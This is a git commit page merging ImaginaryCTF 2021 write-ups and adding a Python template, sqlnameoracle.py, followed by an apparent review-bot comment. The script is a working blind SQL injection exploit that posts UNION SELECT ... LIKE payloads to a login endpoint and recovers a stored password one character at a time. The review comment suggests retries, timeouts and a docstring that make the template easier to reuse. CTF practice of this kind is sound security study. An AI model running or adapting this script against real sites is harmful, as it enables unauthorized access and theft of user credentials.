authorMalfurious <m@lfurio.us>2021-08-03 19:53:26 -0400
committerMalfurious <m@lfurio.us>2021-08-03 19:53:26 -0400
commit5970194d1303e16364ff1405f974c995de46203b (patch)
treed3f748eeb0112205bb7784bd353b22376ee827ae /templates/sqlnameoracle.py
parentef6e3a502bf8498a8f641eb3dad11d3065359bbb (diff)
parentaa9da0f6f27759f5f3201bafb0e52f41367f08ef (diff)
Merge tag 'pull-duso-imaginary-writeups' of https://github.com/Dusoleil/lib-des-gnux
Writeups and other tools/docs from ImaginaryCTF from Dusoleil. * tag 'pull-duso-imaginary-writeups' of https://github.com/Dusoleil/lib-des-gnux: Adding Initial Commit of the Sploit Tool Adding Various Docs Adding Various Small Tools Git Ignore __pycache__ for All Tools Writeups from Imaginary CTF 2021
Diffstat (limited to 'templates/sqlnameoracle.py')
-rwxr-xr-xtemplates/sqlnameoracle.py35
1 files changed, 35 insertions, 0 deletions
diff --git a/templates/sqlnameoracle.py b/templates/sqlnameoracle.py
new file mode 100755
index 0000000..cec6d98
--- /dev/null
+++ b/templates/sqlnameoracle.py
@@ -0,0 +1,35 @@
+#!/usr/bin/env python3
+
+import string
+import requests
+
+url = "https://awkward-bypass.chal.imaginaryctf.org/user"
+
+base = '\' UNION SELECT username, NULL FROM users WHERE '
+#base += 'username LIKE \''
+base += 'password LIKE \''
+tail = '%\' ESCAPE \'!\' --'
+soln = ''
+
+while True :
+ found = False
+ for c in string.printable[:95]:
+ ch = c
+ if ch in '%[]^-!':
+ continue
+ if ch == '_':
+ ch = '!_'
+ test = soln + ch
+ payload = base + test + tail
+ code = 400
+ while code != 200:
+ r = requests.post(url,data={'username':payload,'password':'test'})
+ code = r.status_code
+ log = soln+c
+ print(log+": " if "Error" in r.text else log+": ***********")
+ if not "Error" in r.text :
+ found = True
+ soln += c
+ break
+ if not found:
+ break
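Review bot: The retry loop `while code != 200:` has no upper bound and `requests.post` is called without `timeout=`, so a stalled connection hangs the script. Any persistent non-200 answer (rate limiting, a 5xx, the service being taken down) makes it resend the same request forever with no delay. Bound the attempts, pass a timeout and back off between tries, as sketched below; this needs `import time` at the top, and `MAX_RETRIES` is a constructed name. Because the file sits under templates/ and runs at import time against a hard-coded `url`, a short module docstring should say that the target is meant to be edited per use and that values containing the skipped characters `%[]^-!` end the outer loop early without any message.

```python
# … unchanged: payload construction …
for attempt in range(MAX_RETRIES):  # constructed constant, e.g. 5
    r = requests.post(url, data={'username': payload, 'password': 'test'}, timeout=10)
    if r.status_code == 200:
        break
    time.sleep(1)  # back off instead of resending immediately
else:
    raise SystemExit(f"no 200 response after {MAX_RETRIES} attempts")
# … unchanged: "Error" check and soln update …
```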